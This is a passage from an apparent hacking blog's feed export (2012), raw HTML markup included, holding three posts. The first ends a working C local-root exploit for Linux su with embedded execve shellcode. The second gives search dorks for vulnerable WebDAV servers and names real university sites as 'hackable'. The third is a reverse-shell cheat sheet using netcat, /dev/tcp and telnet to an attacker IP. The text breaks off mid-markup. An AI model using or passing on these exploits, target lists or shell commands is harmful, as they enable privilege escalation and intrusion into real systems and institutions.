-d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char result[32];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;result[0] = 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fgets(result, 32, command);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;pclose(command);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;address = strtoul(result, NULL, 16);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if (address == ULONG_MAX || !address) {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return 1;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Resolved exit@plt to 0x%lx.\n", address);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Calculating su padding.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;FILE *command = popen("su this-user-does-not-exist 2&amp;gt;&amp;amp;1", "r");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char result[256];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;result[0] = 0;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fgets(result, 256, command);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;pclose(command);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;unsigned long offset = address - su_padding;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Seeking to offset 0x%lx.\n", offset);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;lseek64(fd, offset, SEEK_SET);&lt;br /&gt;#if defined(__i386__)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;// See shellcode-32.s in this package for the source.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char shellcode[] =&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x80";&lt;br /&gt;#elif defined(__x86_64__)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;// See shellcode-64.s in this package for the source.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char shellcode[] =&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";&lt;br /&gt;#else&lt;br /&gt;#error "That platform is not supported."&lt;br /&gt;#endif&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Executing su with shellcode.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;execl("/bin/su", "su", shellcode, NULL);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;} else {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;char pid[32];&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;sprintf(pid, "%d", parent_pid);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;printf("[+] Executing child from child fork.\n");&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;execl("/proc/self/exe", argv[0], "-c", pid, NULL);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;br /&gt;}&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-2911083972317620218?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/2911083972317620218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/linux-local-root-for-2639-32-bit-and-64.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2911083972317620218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/2911083972317620218'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/linux-local-root-for-2639-32-bit-and-64.html' title='Linux Local Root for =&gt; 2.6.39, 32-bit and 64-bit'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-1393093359314808452</id><published>2012-01-31T04:34:00.000+06:00</published><updated>2012-01-31T04:34:02.784+06:00</updated><title type='text'>Webdav vulnerability google dork. +3,000 sites infected</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Google dork:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;or&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Just add the /webdav extension to the URL if you found "WebDAV testpage"&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;So go ahead it's Webdav vulnerability hackable :)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Example:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.hebron.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.hebron.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.jcjc.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.jcjc.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://archnet.asu.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://archnet.asu.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://mvl.mit.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://mvl.mit.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.engl.niu.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.engl.niu.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;a href="http://www.mstc.edu/webdav/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://www.mstc.edu/webdav/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Enjoy.&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-1393093359314808452?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/1393093359314808452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/webdav-vulnerability-google-dork-3000.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1393093359314808452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1393093359314808452'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/webdav-vulnerability-google-dork-3000.html' title='Webdav vulnerability google dork. +3,000 sites infected'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-3908591679702925817</id><published>2012-01-31T04:10:00.001+06:00</published><updated>2012-01-31T04:10:34.939+06:00</updated><title type='text'>Having trouble back-connecting? Here ya go!</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Getting quite a few pms about back-connection recently. Heres my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;1. netcat with GAPING_SECURITY_HOLE enabled:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;TARGET:nc 192.168.1.133 8080 -e /bin/bash&lt;br /&gt;ATTACKER:nc -n -vv -l -p 8080&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;2. netcat with GAPING_SECURITY_HOLE disabled:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;TARGET:mknod backpipe p &amp;amp;&amp;amp; nc 192.168.1.133 8080 0&amp;lt;backpipe | /bin/bash 1&amp;gt;backpipe&lt;br /&gt;ATTACKER:nc -n -vv -l -p 8080&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;3. /dev/tcp socket hack&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;TARGET:/bin/bash -i &amp;gt; /dev/tcp/192.168.1.133/8080 0&amp;lt;&amp;amp;1 2&amp;gt;&amp;amp;1&lt;br /&gt;ATTACKER:nc -n -vv -l -p 8080&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;4.no nc or dev/tcp installed?&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;TARGET:mknod backpipe p &amp;amp;&amp;amp; telnet 192.168.1.133 8080 0&amp;lt;backpipe | /bin/bash 1&amp;gt;backpipe&lt;br /&gt;ATTACKER:nc -n -vv -l -p 8080&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;5.backup- no good reason to use ahead of the others&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; 